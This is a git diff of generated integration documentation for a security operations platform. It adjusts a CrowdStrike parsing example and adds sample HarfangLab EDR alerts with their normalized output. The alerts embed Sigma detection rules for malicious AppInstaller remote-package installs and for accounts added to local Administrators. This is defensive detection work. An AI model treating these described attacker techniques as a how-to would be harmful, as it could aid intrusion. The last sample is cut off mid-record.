a/_shared_content/operations_center/integrations/generated/10999b99-9a8d-4b92-9fbd-01e3fac01cd5.md +++ b/_shared_content/operations_center/integrations/generated/10999b99-9a8d-4b92-9fbd-01e3fac01cd5.md @@ -1165,7 +1165,6 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "id": "111111111111111" }, "crowdstrike": { - "base_filename": "svchost.exe", "customer_id": "222222222222222222222" }, "file": { @@ -1181,6 +1180,10 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "platform": "win" } }, + "process": { + "command_line": "svchost.exe", + "name": "svchost.exe" + }, "related": { "ip": [ "4.3.2.1" @@ -2396,7 +2399,6 @@ The following table lists the fields that are extracted, normalized under the EC |`@timestamp` | `date` | Date/time when the event originated. | |`agent.id` | `keyword` | Unique identifier of this agent. | |`agent.version` | `keyword` | Version of the agent. | -|`crowdstrike.base_filename` | `keyword` | Base Filename | |`crowdstrike.customer_id` | `keyword` | Customer ID (cid) | |`crowdstrike.gateway_ip` | `ip` | Gateway IP | |`crowdstrike.gateway_mac` | `keyword` | Gateway MAC | diff --git a/_shared_content/operations_center/integrations/generated/3c7057d3-4689-4fae-8033-6f1f887a70f2.md b/_shared_content/operations_center/integrations/generated/3c7057d3-4689-4fae-8033-6f1f887a70f2.md index 4e1878af8..80a99c5e0 100644 --- a/_shared_content/operations_center/integrations/generated/3c7057d3-4689-4fae-8033-6f1f887a70f2.md +++ b/_shared_content/operations_center/integrations/generated/3c7057d3-4689-4fae-8033-6f1f887a70f2.md @@ -468,6 +468,201 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ``` +=== "alert_4.json" + + ```json + + { + "message": "{\"log_type\":\"alert\",\"maturity\":\"stable\",\"alert_unique_id\":\"11111111-2222-3333-4444-555555555555\",\"alert_time\":\"2024-11-18T09:18:31.852+00:00\",\"@timestamp\":\"2024-11-18T09:18:31.852+00:00\",\"ingestion_date\":\"2024-11-18T09:18:31.852+00:00\",\"@event_create_date\":\"2024-11-18T09:18:31.558Z\",\"detection_date\":\"2024-11-18T09:18:31.558+00:00\",\"rule_name\":\"Package Installed via AppInstaller from the Internet\",\"rule_id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"msg\":\"Detects URL requests performed by AppInstaller in order to install a remote application.\\nAdversaries have been seen abusing the AppInstaller URI scheme (ms-appinstaller) to trick users into installing malicious software directly from Internet.\\nMicrosoft has disabled installation of remote package by default in late December 2023 but it can still be enabled via a group policy configuration.\\nIt is recommended to check if the accessed URL correspond to a known and legitimate application and if suspicious commands have been launched during the installation process.\\n\",\"type\":\"rtlogs\",\"alert_subtype\":\"process\",\"alert_type\":\"sigma\",\"status\":\"new\",\"level\":\"medium\",\"level_int\":30,\"execution\":0,\"quarantine\":4,\"details_url_request\":{\"url\":\"https://url.integration.com/test\",\"verb\":\"POST\",\"host\":\"url.integration.com\",\"event_time\":\"2024-11-18T09:18:30.550347Z\"},\"tags\":[\"attack.initial_access\",\"attack.t1189.001\"],\"mitre_cells\":[],\"agent\":{\"agentid\":\"11111111-aaaa-bbbb-cccc-222222222222\",\"hostname\":\"HOST01\",\"domain\":null,\"domainname\":\"DOMAINSI\",\"dnsdomainname\":\"intra.domain.fr\",\"ostype\":\"windows\",\"osversion\":\"10.0.19045\",\"distroid\":null,\"osproducttype\":\"Windows 10 Pro\",\"version\":\"4.2.10\",\"additional_info\":{}},\"process\":{\"commandline\":\"C:\\\\Program Files\\\\WindowsApps\\\\Microsoft.DesktopAppInstaller_1.24.25180.0_x64__8wekyb3d8bbwe\\\\AppInstaller.exe -ServerName:App.AppX9rwyqtrq9gw3wnmrap9a412nsc7145qh.mca\",\"create_time\":\"2024-11-18T09:18:29.211Z\",\"current_directory\":\"C:\\\\Program Files\\\\WindowsApps\\\\Microsoft.DesktopAppInstaller_1.24.25180.0_x64__8wekyb3d8bbwe\\\\\",\"hashes\":{\"md5\":\"b4e821b2dac20d8d2ac6889f9c3fc315\",\"sha1\":\"a53b060cfb5e23508b4f9658d904cd7cb659de7f\",\"sha256\":\"3cc3cbf238e81e92242f4c5f422d85636d1771f2ebc781c2c8de5394f0741b45\"},\"image_name\":\"C:\\\\Program Files\\\\WindowsApps\\\\Microsoft.DesktopAppInstaller_1.24.25180.0_x64__8wekyb3d8bbwe\\\\AppInstaller.exe\",\"log_type\":\"process\",\"parent_commandline\":\"C:\\\\WINDOWS\\\\system32\\\\svchost.exe -k DcomLaunch -p\",\"parent_image\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"parent_unique_id\":\"aaaaaaaa-1111-bbbb-2222-cccccccccccc\",\"pid\":20188,\"ppid\":1332,\"process_name\":\"AppInstaller.exe\",\"process_unique_id\":\"11111111-aaaa-2222-bbbb-333333333333\",\"size\":2860064,\"username\":\"DOMAINSI\\\\JDOE\",\"grandparent_image\":\"C:\\\\Windows\\\\System32\\\\services.exe\",\"grandparent_commandline\":\"C:\\\\WINDOWS\\\\system32\\\\services.exe\",\"grandparent_unique_id\":\"66666666-7777-8888-9999-000000000000\",\"stacktrace\":\"\",\"stacktrace_minimal\":\"\",\"ancestors\":\"C:\\\\Windows\\\\System32\\\\svchost.exe|C:\\\\Windows\\\\System32\\\\services.exe|C:\\\\Windows\\\\System32\\\\wininit.exe\",\"usersid\":\"S-1-2-3-4-5\",\"integrity_level\":\"Low\",\"session\":1,\"logonid\":1686269,\"parent_integrity_level\":\"System\",\"grandparent_integrity_level\":\"System\",\"fake_ppid\":0,\"fake_parent_image\":\"\",\"fake_parent_commandline\":\"\",\"pe_info\":{\"company_name\":\"Microsoft Corporation\",\"file_description\":\"AppInstaller.exe\",\"file_version\":\"1.24.25180.00000\",\"internal_name\":\"AppInstaller\",\"legal_copyright\":\"\u00a9Microsoft Corporation. All rights reserved.\",\"original_filename\":\"AppInstaller.exe\",\"pe_timestamp\":\"2024-10-25T23:14:08.000Z\",\"product_name\":\"Microsoft Desktop App Installer\",\"product_version\":\"1.24.25180.0\"},\"signed\":true,\"signature_info\":{\"signer_info\":{\"serial_number\":\"1234567890\",\"thumbprint\":\"8f985be8fd256085c90a95d3c74580511a1db975\",\"thumbprint_sha256\":\"e4ab39116a7dc57d073164eb1c840b1fb8334a8c920b92efafea19112dce643b\",\"issuer_name\":\"Microsoft Code Signing PCA 2011\",\"display_name\":\"Microsoft Corporation\"},\"root_info\":{\"serial_number\":\"abcdef12\",\"thumbprint\":\"8f43288ad272f3103b6fb1428485ea3014c0bcfe\",\"thumbprint_sha256\":\"847df6a78497943f27fc72eb93f9a637320a02b561d0a91b09e87a7807ed7c61\",\"issuer_name\":\"Microsoft Root Certificate Authority 2011\",\"display_name\":\"Microsoft Root Certificate Authority 2011\"},\"signed_authenticode\":true,\"signed_catalog\":false},\"pe_timestamp_int\":1729898048,\"pe_timestamp\":\"2024-10-25T23:14:08.000Z\",\"pe_imphash\":\"714FD4ADFC932C947A3949463867BE18\",\"dont_create_process\":true,\"status\":0,\"detection_timestamp\":\"2024-11-18T09:18:31.558Z\",\"system_event_type\":\"url_request_event\",\"ioc_matches\":[],\"log_platform_flag\":0,\"sigma_rule_content\":\"title: \\\"Package Installed via AppInstaller from the Internet\\\"\\nid: aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\\ndescription: |\\n Detects URL requests performed by AppInstaller in order to install a remote application.\\n Adversaries have been seen abusing the AppInstaller URI scheme (ms-appinstaller) to trick users into installing malicious software directly from Internet.\\n Microsoft has disabled installation of remote package by default in late December 2023 but it can still be enabled via a group policy configuration.\\n It is recommended to check if the accessed URL correspond to a known and legitimate application and if suspicious commands have been launched during the installation process.\\nreferences:\\n - https://www.microsoft.com/en-us/security/blog/2023/12/28/financially-motivated-threat-actors-misusing-app-installer/\\n - https://learn.microsoft.com/en-us/windows/msix/app-installer/installing-windows10-apps-web\\n - https://lolbas-project.github.io/lolbas/Binaries/AppInstaller/\\n - https://attack.mitre.org/techniques/T1189/\\nstatus: stable\\ndate: 2023/12/28\\nmodified: 2024/01/10\\nauthor: HarfangLab\\ntags:\\n - attack.initial_access\\n - attack.t1189.001\\nlogsource:\\n product: windows\\n category: url_request\\ndetection:\\n selection:\\n ProcessOriginalFileName: AppInstaller.exe\\n ProcessCommandLine|contains: -ServerName:App.AppX9rwyqtrq9gw3wnmrap9a412nsc7145qh.mca\\n\\n exclusion_knownurl:\\n RequestUrlHost:\\n - download.mytobiidynavox.com # Snap.Windows.WinUI.OEM_1.30.0.3621.msixbundle\\n - windbg.download.prss.microsoft.com # windbg.appinstaller\\n - languagetool.org # Languagetool.Packaging_0.5.3.5_x64.msixbundle\\n - staticcdn.duckduckgo.com # DuckDuckGo_0.61.5.0.msixbundle\\n condition: selection and not 1 of exclusion_*\\nlevel: medium\"},\"detection_origin\":\"agent\",\"image_name\":\"C:\\\\Program Files\\\\WindowsApps\\\\Microsoft.DesktopAppInstaller_1.24.25180.0_x64__8wekyb3d8bbwe\\\\AppInstaller.exe\",\"rule_content\":\"title: \\\"Package Installed via AppInstaller from the Internet\\\"\\nid: aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\\ndescription: |\\n Detects URL requests performed by AppInstaller in order to install a remote application.\\n Adversaries have been seen abusing the AppInstaller URI scheme (ms-appinstaller) to trick users into installing malicious software directly from Internet.\\n Microsoft has disabled installation of remote package by default in late December 2023 but it can still be enabled via a group policy configuration.\\n It is recommended to check if the accessed URL correspond to a known and legitimate application and if suspicious commands have been launched during the installation process.\\nreferences:\\n - https://www.microsoft.com/en-us/security/blog/2023/12/28/financially-motivated-threat-actors-misusing-app-installer/\\n - https://learn.microsoft.com/en-us/windows/msix/app-installer/installing-windows10-apps-web\\n - https://lolbas-project.github.io/lolbas/Binaries/AppInstaller/\\n - https://attack.mitre.org/techniques/T1189/\\nstatus: stable\\ndate: 2023/12/28\\nmodified: 2024/01/10\\nauthor: HarfangLab\\ntags:\\n - attack.initial_access\\n - attack.t1189.001\\nlogsource:\\n product: windows\\n category: url_request\\ndetection:\\n selection:\\n ProcessOriginalFileName: AppInstaller.exe\\n ProcessCommandLine|contains: -ServerName:App.AppX9rwyqtrq9gw3wnmrap9a412nsc7145qh.mca\\n\\n exclusion_knownurl:\\n RequestUrlHost:\\n - download.mytobiidynavox.com # Snap.Windows.WinUI.OEM_1.30.0.3621.msixbundle\\n - windbg.download.prss.microsoft.com # windbg.appinstaller\\n - languagetool.org # Languagetool.Packaging_0.5.3.5_x64.msixbundle\\n - staticcdn.duckduckgo.com # DuckDuckGo_0.61.5.0.msixbundle\\n condition: selection and not 1 of exclusion_*\\nlevel: medium\",\"aggregation_key\":\"1609170aa71e23cf15ca43adc927697e071c4a4207f8d4fc9d74f7382b4e9b9c\",\"threat_type\":\"commandline\",\"threat_values\":[\":\\\\program files\\\\windowsapps\\\\microsoft.desktopappinstaller_1.24.25180.0_x64__8wekyb3d8bbwe\\\\appinstaller.exe -servername:app.appx9rwyqtrq9gw3wnmrap9a412nsc7145qh.mca\"],\"threat_key\":1343,\"groups\":[{\"id\":\"12345678-abcd-ef90-1234-123456abcdef\",\"name\":\"DOMAIN_Postes_de_travail_Windows\"}]}", + "event": { + "category": [ + "process" + ], + "dataset": "alert", + "kind": "alert", + "type": [ + "start" + ] + }, + "@timestamp": "2024-11-18T09:18:31.558000Z", + "agent": { + "id": "11111111-aaaa-bbbb-cccc-222222222222", + "name": "harfanglab" + }, + "file": { + "hash": { + "md5": "b4e821b2dac20d8d2ac6889f9c3fc315", + "sha1": "a53b060cfb5e23508b4f9658d904cd7cb659de7f", + "sha256": "3cc3cbf238e81e92242f4c5f422d85636d1771f2ebc781c2c8de5394f0741b45" + } + }, + "harfanglab": { + "aggregation_key": "1609170aa71e23cf15ca43adc927697e071c4a4207f8d4fc9d74f7382b4e9b9c", + "alert_subtype": "process", + "alert_time": "2024-11-18T09:18:31.852+00:00", + "alert_unique_id": "11111111-2222-3333-4444-555555555555", + "execution": 0, + "groups": [ + "{\"id\": \"12345678-abcd-ef90-1234-123456abcdef\", \"name\": \"DOMAIN_Postes_de_travail_Windows\"}" + ], + "level": "medium", + "status": "new" + }, + "host": { + "domain": "DOMAINSI", + "hostname": "HOST01", + "name": "HOST01", + "os": { + "full": "Windows 10 Pro", + "version": "10.0.19045" + } + }, + "log": { + "hostname": "HOST01" + }, + "process": { + "command_line": "C:\\Program Files\\WindowsApps\\Microsoft.DesktopAppInstaller_1.24.25180.0_x64__8wekyb3d8bbwe\\AppInstaller.exe -ServerName:App.AppX9rwyqtrq9gw3wnmrap9a412nsc7145qh.mca", + "executable": "C:\\Program Files\\WindowsApps\\Microsoft.DesktopAppInstaller_1.24.25180.0_x64__8wekyb3d8bbwe\\AppInstaller.exe", + "name": "AppInstaller.exe", + "parent": { + "command_line": "C:\\WINDOWS\\system32\\svchost.exe -k DcomLaunch -p", + "executable": "C:\\Windows\\System32\\svchost.exe" + }, + "pe": { + "company": "Microsoft Corporation", + "description": "AppInstaller.exe", + "file_version": "1.24.25180.00000", + "imphash": "714FD4ADFC932C947A3949463867BE18", + "original_file_name": "AppInstaller.exe", + "product": "Microsoft Desktop App Installer" + }, + "pid": 20188, + "working_directory": "C:\\Program Files\\WindowsApps\\Microsoft.DesktopAppInstaller_1.24.25180.0_x64__8wekyb3d8bbwe\\" + }, + "related": { + "hash": [ + "3cc3cbf238e81e92242f4c5f422d85636d1771f2ebc781c2c8de5394f0741b45", + "a53b060cfb5e23508b4f9658d904cd7cb659de7f", + "b4e821b2dac20d8d2ac6889f9c3fc315" + ], + "hosts": [ + "HOST01" + ], + "user": [ + "DOMAINSI\\JDOE" + ] + }, + "rule": { + "category": "sigma", + "description": "Detects URL requests performed by AppInstaller in order to install a remote application.\nAdversaries have been seen abusing the AppInstaller URI scheme (ms-appinstaller) to trick users into installing malicious software directly from Internet.\nMicrosoft has disabled installation of remote package by default in late December 2023 but it can still be enabled via a group policy configuration.\nIt is recommended to check if the accessed URL correspond to a known and legitimate application and if suspicious commands have been launched during the installation process.\n", + "id": "aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee", + "name": "Package Installed via AppInstaller from the Internet" + }, + "url": { + "domain": "url.integration.com", + "original": "https://url.integration.com/test", + "path": "/test", + "port": 443, + "registered_domain": "integration.com", + "scheme": "https", + "subdomain": "url", + "top_level_domain": "com" + }, + "user": { + "name": "DOMAINSI\\JDOE", + "roles": "DOMAIN_Postes_de_travail_Windows" + } + } + + ``` + + +=== "alert_5.json" + + ```json + + { + "message": "{\"type\": \"rtlogs\", \"level\": \"medium\", \"maturity\": \"stable\", \"quarantine\": 4, \"rule_content\": \"title: User Account Added to the Local Administrators Group\\nid: 12345678-abcd-ef90-1234-123456abcdef\\ndescription: \\\"Detects when a user account is added into the local Administrators group.\\\\n\\nThis action can be the result of a malicious activity.\\\"\\nreferences:\\n - https://attack.mitre.org/techniques/T1098/\\n - https://attack.mitre.org/techniques/T1078/003/\\nstatus: stable\\ndate: 2021/04/28\\nmodified: 2021/01/10\\nauthor: HarfangLab\\ntags:\\n - attack.persistence\\n - attack.t1098\\n - attack.privilege_escalation\\n - attack.t1078.003\\nlogsource:\\n product: windows\\n service: security\\ndetection:\\n selection:\\n EventID: 4732\\n GroupSid: S-1-2-3-4\\n exclusion:\\n - MemberSid: S-1-2-4-*-512 # avoid detection when a computer joined a domain (domain admins sid)\\n - SubjectUserName|endswith: \\n condition: selection and not exclusion\\nfalsepositives:\\n - Legitimate administrator action\\nlevel: medium\", \"alert_time\": \"2024-11-12T08:39:14.017+00:00\", \"rule_name\": \"User Account Added to the Local Administrators Group\", \"tags\": [\"attack.persistence\", \"attack.privilege_escalation\", \"attack.t1078.003\", \"attack.t1098\"], \"level_int\": 30, \"eventlog\": {\"level\": \"log_always\", \"type\": \"wineventlog\", \"detection_timestamp\": \"2024/11/12 08:39:13.967\", \"event_id\": 4732, \"event_data\": {\"SubjectUserSid\": \"S-1-2-4-5-6\", \"SubjectDomainName\": \"NT_DOMAIN\", \"PrivilegeList\": \"-\", \"TargetDomainName\": \"Builtin\", \"TargetUserName\": \"Administrateurs\", \"MemberSid\": \"S-1-2-4-7-8\", \"MemberName\": \"NT_DOMAIN\\\\DOEJ\", \"SubjectUserName\": \"sw-suser\", \"TargetSid\": \"S-1-2-3-4\", \"SubjectLogonId\": \"0x1234567\"}, \"record_number\": 174136362, \"event_date\": \"2024-11-12T08:39:13.205Z\", \"sigma_rule_content\": \"title: User Account Added to the Local Administrators Group\\nid: 12345678-abcd-ef90-1234-123456abcdef\\ndescription: \\\"Detects when a user account is added into the local Administrators group.\\\\n\\nThis action can be the result of a malicious activity.\\\"\\nreferences:\\n - https://attack.mitre.org/techniques/T1098/\\n - https://attack.mitre.org/techniques/T1078/003/\\nstatus: stable\\ndate: 2021/04/28\\nmodified: 2021/01/10\\nauthor: HarfangLab\\ntags:\\n - attack.persistence\\n - attack.t1098\\n - attack.privilege_escalation\\n - attack.t1078.003\\nlogsource:\\n product: windows\\n service: security\\ndetection:\\n selection:\\n EventID: 4732\\n GroupSid: S-1-2-3-4\\n exclusion:\\n - MemberSid: S-1-2-4-*-512 # avoid detection when a computer joined a domain (domain admins sid)\\n - SubjectUserName|endswith: \\n condition: selection and not exclusion\\nfalsepositives:\\n - Legitimate administrator action\\nlevel: medium\", \"source_name\": \"Microsoft-Windows-Security-Auditing\", \"dont_create_eventlog\": true, \"user\": {\"domain\": \"\", \"name\": \"\", \"type\": \"unknown\", \"identifier\": \"\"}, \"thread_id\": 1728, \"log_name\": \"Security\", \"process_id\": 1224, \"status\": 0, \"ioc_matches\": [], \"provider_guid\": \"54849625-5478-4994-a5ba-3e3b0328c30d\", \"keywords\": [\"AuditSuccess\", \"ReservedKeyword63\"], \"log_type\": \"eventlog\", \"computer_name\": \"PC01.domain.com\", \"user_data\": {}, \"system_event_type\": \"event_log_event\"}, \"threat_values\": [], \"destination\": \"syslog\", \"@timestamp\": \"2024-11-12T08:39:14.017Z\", \"detection_date\": \"2024-11-12T08:39:13.967+00:00\", \"@event_create_date\": \"2024-11-12T08:39:14.017Z\", \"aggregation_key\": \"8415b902c507b98714301b4ab6633009fbf2728c0cfaf61637c5e903627e4ebb\", \"alert_type\": \"sigma\", \"rule_id\": \"12345678-abcd-ef90-1234-123456abcdef\", \"ingestion_date\": \"2024-11-12T08:39:14.017+00:00\", \"tenant\": \"3b37ffc8520ef542\", \"threat_type\": \"new\", \"groups\": [{\"name\": \"Postes de travail\", \"id\": \"11111111-2222-3333-4444-555555555555\"}, {\"name\": \"Postes de travail : Lot 3\", \"id\": \"66666666-7777-8888-9999-000000000000\"}], \"status\": \"new\", \"execution\": 0, \"agent\": {\"agentid\": \"11111111-aaaa-2222-bbbb-333333333333\", \"domain\": null, \"osproducttype\": \"Windows 10 Enterprise\", \"ostype\": \"windows\", \"dnsdomainname\": \"domain.com\", \"distroid\": null, \"domainname\": \"NT_DOMAIN\", \"osversion\": \"10.0.19045\", \"hostname\": \"PC01\", \"version\": \"4.1.6\", \"additional_info\": {}}, \"threat_key\": \"20528\", \"mitre_cells\": [\"persistence__t1078.003\", \"persistence__t1098\", \"privilege-escalation__t1078.003\", \"privilege-escalation__t1098\"], \"alert_unique_id\": \"aaaaaaaa-1111-bbbb-2222-cccccccccccc\", \"log_type\": \"alert\", \"@version\": \"1\", \"msg\": \"Detects when a user account is added into the local Administrators group.\\n This action can be the result of a malicious activity.\", \"alert_subtype\": \"eventlog\", \"detection_origin\": \"agent\"}", + "event": { + "dataset": "alert", + "kind": "alert", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-12T08:39:14.017000Z", + "action": { + "properties": { + "MemberName": "DOEJ", + "SubjectDomainName": "NT_DOMAIN", + "SubjectLogonId": "0x1234567", + "SubjectUserName": "sw-suser", + "SubjectUserSid": "S-1-2-4-5-6", + "TargetDomainName": "Builtin", + "TargetSid": "S-1-2-3-4", + "TargetUserName": "Administrateurs" + } + }, + "agent": { + "id": "11111111-aaaa-2222-bbbb-333333333333", + "name": "harfanglab" + }, + "harfanglab": { + "aggregation_key": "8415b902c507b98714301b4ab6633009fbf2728c0cfaf61637c5e903627e4ebb", + "alert_subtype": "eventlog", + "alert_time": "2024-11-12T08:39:14.017+00:00", + "alert_unique_id": "aaaaaaaa-1111-bbbb-2222-cccccccccccc", + "execution": 0, + "groups": [ + "{\"id\": \"11111111-2222-3333-4444-555555555555\", \"name\": \"Postes de travail\"}", + "{\"id\": \"66666666-7777-8888-9999-000000000000\", \"name\": \"Postes de travail : Lot 3\"}" + ], + "level": "medium", + "status": "new" + }, + "host": { + "domain": "NT_DOMAIN", + "hostname": "PC01", + "name": "PC01", + "os": { + "full": "Windows 10 Enterprise", + "version": "10.0.19045" + } + }, + "log": { + "hostname": "PC01" + }, + "organization": { + "id": "3b37ffc8520ef542" + }, + "related": { + "hosts": [ + "PC01" + ], + "user": [ + "sw-suser" + ] + }, + "rule": { + "category": "sigma", + "description": "Detects when a user account is added into the local Administrators group.\n This action can be the result of a malicious activity.", + "id": "12345678-abcd-ef90-1234-123456abcdef", + "name": "User Account Added to the Local Administrators Group" + }, + "user": { + "domain": "NT_DOMAIN", + "name": "sw-suser", + "roles": "Postesdetravail,Postesdetravail:Lot3", + "target": { + "domain": "Builtin", + "name": "Administrateurs" + } + } + } + + ``` + + === "alert_false_positive.json" ```json @@ -2916,6 +3111,7 @@ The following table lists the fields that are extracted, normalized under the EC |`rule.name` | `keyword` | Rule name | |`source.ip` | `ip` | IP address of the source. | |`source.port` | `long` | Port of the source. | +|`url.original` | `wildcard` | Unmodified original url as seen in the event source. | |`url.path` | `wildcard` | Path of the request, such as "/search". | |`user.domain` | `keyword` | Name of the directory the user is a member of. | |`user.id` | `keyword` | Unique identifier of the user. | diff --git a/_shared_content/operations_center/integrations/generated/3c7057d3-4689-4fae-8033-6f1f887a70f2_sample.md b/_shared_content/operations_center/integrations/generated/3c7057d3-4689-4fae-8033-6f1f887a70f2_sample.md index a74c24adf..43badf142 100644 --- a/_shared_content/operations_center/integrations/generated/3c7057d3-4689-4fae-8033-6f1f887a70f2_sample.md +++ b/_shared_content/operations_center/integrations/generated/3c7057d3-4689-4fae-8033-6f1f887a70f2_sample.md @@ -533,6 +533,266 @@ In this section, you will find examples of raw logs as generated natively by the +=== "alert_4" + + + ```json + { + "log_type": "alert", + "maturity": "stable", + "alert_unique_id": "11111111-2222-3333-4444-555555555555", + "alert_time": "2024-11-18T09:18:31.852+00:00", + "@timestamp": "2024-11-18T09:18:31.852+00:00", + "ingestion_date": "2024-11-18T09:18:31.852+00:00", + "@event_create_date": "2024-11-18T09:18:31.558Z", + "detection_date": "2024-11-18T09:18:31.558+00:00", + "rule_name": "Package Installed via AppInstaller from the Internet", + "rule_id": "aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee", + "msg": "Detects URL requests performed by AppInstaller in order to install a remote application.\nAdversaries have been seen abusing the AppInstaller URI scheme (ms-appinstaller) to trick users into installing malicious software directly from Internet.\nMicrosoft has disabled installation of remote package by default in late December 2023 but it can still be enabled via a group policy configuration.\nIt is recommended to check if the accessed URL correspond to a known and legitimate application and if suspicious commands have been launched during the installation process.\n", + "type": "rtlogs", + "alert_subtype": "process", + "alert_type": "sigma", + "status": "new", + "level": "medium", + "level_int": 30, + "execution": 0, + "quarantine": 4, + "details_url_request": { + "url": "https://url.integration.com/test", + "verb": "POST", + "host": "url.integration.com", + "event_time": "2024-11-18T09:18:30.550347Z" + }, + "tags": [ + "attack.initial_access", + "attack.t1189.001" + ], + "mitre_cells": [], + "agent": { + "agentid": "11111111-aaaa-bbbb-cccc-222222222222", + "hostname": "HOST01", + "domain": null, + "domainname": "DOMAINSI", + "dnsdomainname": "intra.domain.fr", + "ostype": "windows", + "osversion": "10.0.19045", + "distroid": null, + "osproducttype": "Windows 10 Pro", + "version": "4.2.10", + "additional_info": {} + }, + "process": { + "commandline": "C:\\Program Files\\WindowsApps\\Microsoft.DesktopAppInstaller_1.24.25180.0_x64__8wekyb3d8bbwe\\AppInstaller.exe -ServerName:App.AppX9rwyqtrq9gw3wnmrap9a412nsc7145qh.mca", + "create_time": "2024-11-18T09:18:29.211Z", + "current_directory": "C:\\Program Files\\WindowsApps\\Microsoft.DesktopAppInstaller_1.24.25180.0_x64__8wekyb3d8bbwe\\", + "hashes": { + "md5": "b4e821b2dac20d8d2ac6889f9c3fc315", + "sha1": "a53b060cfb5e23508b4f9658d904cd7cb659de7f", + "sha256": "3cc3cbf238e81e92242f4c5f422d85636d1771f2ebc781c2c8de5394f0741b45" + }, + "image_name": "C:\\Program Files\\WindowsApps\\Microsoft.DesktopAppInstaller_1.24.25180.0_x64__8wekyb3d8bbwe\\AppInstaller.exe", + "log_type": "process", + "parent_commandline": "C:\\WINDOWS\\system32\\svchost.exe -k DcomLaunch -p", + "parent_image": "C:\\Windows\\System32\\svchost.exe", + "parent_unique_id": "aaaaaaaa-1111-bbbb-2222-cccccccccccc", + "pid": 20188, + "ppid": 1332, + "process_name": "AppInstaller.exe", + "process_unique_id": "11111111-aaaa-2222-bbbb-333333333333", + "size": 2860064, + "username": "DOMAINSI\\JDOE", + "grandparent_image": "C:\\Windows\\System32\\services.exe", + "grandparent_commandline": "C:\\WINDOWS\\system32\\services.exe", + "grandparent_unique_id": "66666666-7777-8888-9999-000000000000", + "stacktrace": "", + "stacktrace_minimal": "", + "ancestors": "C:\\Windows\\System32\\svchost.exe|C:\\Windows\\System32\\services.exe|C:\\Windows\\System32\\wininit.exe", + "usersid": "S-1-2-3-4-5", + "integrity_level": "Low", + "session": 1, + "logonid": 1686269, + "parent_integrity_level": "System", + "grandparent_integrity_level": "System", + "fake_ppid": 0, + "fake_parent_image": "", + "fake_parent_commandline": "", + "pe_info": { + "company_name": "Microsoft Corporation", + "file_description": "AppInstaller.exe", + "file_version": "1.24.25180.00000", + "internal_name": "AppInstaller", + "legal_copyright": "\u00a9Microsoft Corporation. All rights reserved.", + "original_filename": "AppInstaller.exe", + "pe_timestamp": "2024-10-25T23:14:08.000Z", + "product_name": "Microsoft Desktop App Installer", + "product_version": "1.24.25180.0" + }, + "signed": true, + "signature_info": { + "signer_info": { + "serial_number": "1234567890", + "thumbprint": "8f985be8fd256085c90a95d3c74580511a1db975", + "thumbprint_sha256": "e4ab39116a7dc57d073164eb1c840b1fb8334a8c920b92efafea19112dce643b", + "issuer_name": "Microsoft Code Signing PCA 2011", + "display_name": "Microsoft Corporation" + }, + "root_info": { + "serial_number": "abcdef12", + "thumbprint": "8f43288ad272f3103b6fb1428485ea3014c0bcfe", + "thumbprint_sha256": "847df6a78497943f27fc72eb93f9a637320a02b561d0a91b09e87a7807ed7c61", + "issuer_name": "Microsoft Root Certificate Authority 2011", + "display_name": "Microsoft Root Certificate Authority 2011" + }, + "signed_authenticode": true, + "signed_catalog": false + }, + "pe_timestamp_int": 1729898048, + "pe_timestamp": "2024-10-25T23:14:08.000Z", + "pe_imphash": "714FD4ADFC932C947A3949463867BE18", + "dont_create_process": true, + "status": 0, + "detection_timestamp": "2024-11-18T09:18:31.558Z", + "system_event_type": "url_request_event", + "ioc_matches": [], + "log_platform_flag": 0, + "sigma_rule_content": "title: \"Package Installed via AppInstaller from the Internet\"\nid: aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\ndescription: |\n Detects URL requests performed by AppInstaller in order to install a remote application.\n Adversaries have been seen abusing the AppInstaller URI scheme (ms-appinstaller) to trick users into installing malicious software directly from Internet.\n Microsoft has disabled installation of remote package by default in late December 2023 but it can still be enabled via a group policy configuration.\n It is recommended to check if the accessed URL correspond to a known and legitimate application and if suspicious commands have been launched during the installation process.\nreferences:\n - https://www.microsoft.com/en-us/security/blog/2023/12/28/financially-motivated-threat-actors-misusing-app-installer/\n - https://learn.microsoft.com/en-us/windows/msix/app-installer/installing-windows10-apps-web\n - https://lolbas-project.github.io/lolbas/Binaries/AppInstaller/\n - https://attack.mitre.org/techniques/T1189/\nstatus: stable\ndate: 2023/12/28\nmodified: 2024/01/10\nauthor: HarfangLab\ntags:\n - attack.initial_access\n - attack.t1189.001\nlogsource:\n product: windows\n category: url_request\ndetection:\n selection:\n ProcessOriginalFileName: AppInstaller.exe\n ProcessCommandLine|contains: -ServerName:App.AppX9rwyqtrq9gw3wnmrap9a412nsc7145qh.mca\n\n exclusion_knownurl:\n RequestUrlHost:\n - download.mytobiidynavox.com # Snap.Windows.WinUI.OEM_1.30.0.3621.msixbundle\n - windbg.download.prss.microsoft.com # windbg.appinstaller\n - languagetool.org # Languagetool.Packaging_0.5.3.5_x64.msixbundle\n - staticcdn.duckduckgo.com # DuckDuckGo_0.61.5.0.msixbundle\n condition: selection and not 1 of exclusion_*\nlevel: medium" + }, + "detection_origin": "agent", + "image_name": "C:\\Program Files\\WindowsApps\\Microsoft.DesktopAppInstaller_1.24.25180.0_x64__8wekyb3d8bbwe\\AppInstaller.exe", + "rule_content": "title: \"Package Installed via AppInstaller from the Internet\"\nid: aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\ndescription: |\n Detects URL requests performed by AppInstaller in order to install a remote application.\n Adversaries have been seen abusing the AppInstaller URI scheme (ms-appinstaller) to trick users into installing malicious software directly from Internet.\n Microsoft has disabled installation of remote package by default in late December 2023 but it can still be enabled via a group policy configuration.\n It is recommended to check if the accessed URL correspond to a known and legitimate application and if suspicious commands have been launched during the installation process.\nreferences:\n - https://www.microsoft.com/en-us/security/blog/2023/12/28/financially-motivated-threat-actors-misusing-app-installer/\n - https://learn.microsoft.com/en-us/windows/msix/app-installer/installing-windows10-apps-web\n - https://lolbas-project.github.io/lolbas/Binaries/AppInstaller/\n - https://attack.mitre.org/techniques/T1189/\nstatus: stable\ndate: 